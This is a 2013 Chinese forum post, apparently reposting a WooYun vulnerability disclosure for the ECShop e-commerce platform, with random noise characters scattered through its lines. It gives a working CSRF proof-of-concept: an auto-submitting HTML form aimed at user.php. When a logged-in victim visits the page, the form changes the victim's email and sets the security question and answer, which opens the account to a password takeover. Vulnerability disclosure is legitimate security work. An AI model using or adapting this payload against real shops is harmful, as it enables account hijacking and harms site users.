找回密码
 立即注册
查看: 2670|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
/ P6 i) A: z: t( \( `& Recshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现' n; l" g9 r$ U6 A3 d

' T2 w) d4 F8 u) ~Demo For:http://www.wooyun.org/bug.php?action=view&id=3955 T9 p9 T+ A' \

1 b. M$ d9 \6 v0 u  F" V详细说明:
% y* q% x2 U( h! E利用csrf和xss可以突破官方所说的“障碍”
( i# l8 ?" z7 A0 L: c5 Gxss版本已经有人说明
5 d2 _3 d1 l; @! _+ e/ c! q这里给出csrf版本+ s; f: |) T, q1 q6 ^1 `. c

1 }8 n' P  X6 V3 ]0 I: ]! l& j; X$ u漏洞证明:% o% L; o6 \) R& D8 I' U6 K0 Y& G9 G; z
<html>
2 ?) d) g' u6 L5 K9 \9 y<body>
) ?; `) }: y6 ]. t+ n: s+ E<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
7 }' x' I& c8 p( A<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
/ l5 G" z% W$ z# i. m8 u4 K( s<INPUT TYPE="text" NAME="act" value="act_edit_profile">6 L+ A' }& B4 S/ j4 B- M
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
4 y7 T+ e% E7 F0 h/ s- ~$ x<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
' [& M7 h. ~) A0 i# \7 Z$ C</body>+ f) F5 _! D# s3 W1 j% G' ]5 M
<script>
4 _( ?1 [# t2 i; K) y- fdocument.forms[0].submit();2 R4 y: q! ?  s" D) I1 H& `
</script>
3 O. F: E* f: j$ N9 T</html>" }0 Q8 f. l8 {. z; I
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 ?% @* O& S5 u$ U8 H: O
+ x, W# I! k+ z" L9 r6 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表